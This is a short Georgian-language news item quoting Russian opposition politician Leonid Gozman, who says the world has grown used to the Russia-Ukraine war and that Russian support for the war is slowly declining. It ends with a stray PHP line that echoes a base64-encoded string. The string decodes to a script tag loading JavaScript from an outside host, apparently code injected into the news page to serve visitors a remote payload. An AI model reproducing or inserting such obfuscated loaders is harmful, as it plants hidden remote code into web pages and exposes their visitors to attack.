celsiusi
ავერსი საქკაბელი
მთელი მსოფლიო მიეჩვია ამ ომს, რაც ძალიან სევდიანია, – ამის შესახებ, რადიო "მაესტროსთან" ინტერვიუში, რუსეთ–უკრაინის ომზე საუბრისას  რუსმა ოპოზიციონერმა პოლიტიკოსმა ლეონიდ გოზმანმა განაცხადა.  
 
"მიეჩვია საზოგადოება, ვშიშობ რომ ეს ასეა. ყოველი შემთხვევისთვის, არ იწვევს ისეთ ძლიერ ემოციებს, როგორიც იყო ომის დაწყების პერიოდში.  სხვათა შორის, მთელი მსოფლიო მიეჩვია ამ ომს, რაც ძალიან სევდიანია. პირველ დღეებში ცივილიზებული მსოფლიო მხოლოდ ამ ომზე საუბრობდა, დღეს უკვე სხვა რაღაცეებზეც საუბრობს. ეს ხომ ბუნებრივია, სამწუხაროა, მაგრამ ბუნებრივია. ჩვენები კი, ომს ნელნელა, მაგრამ ეჩვევიან, კი. ჩემი დაკვირვებით, ომის მხარდაჭერა რუსეთში მაინც მცირდება, მაგრამ გადაჭრით ამის თქმა მე არ შემიძლია."– განაცხადა გოზმანმა. 
635
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");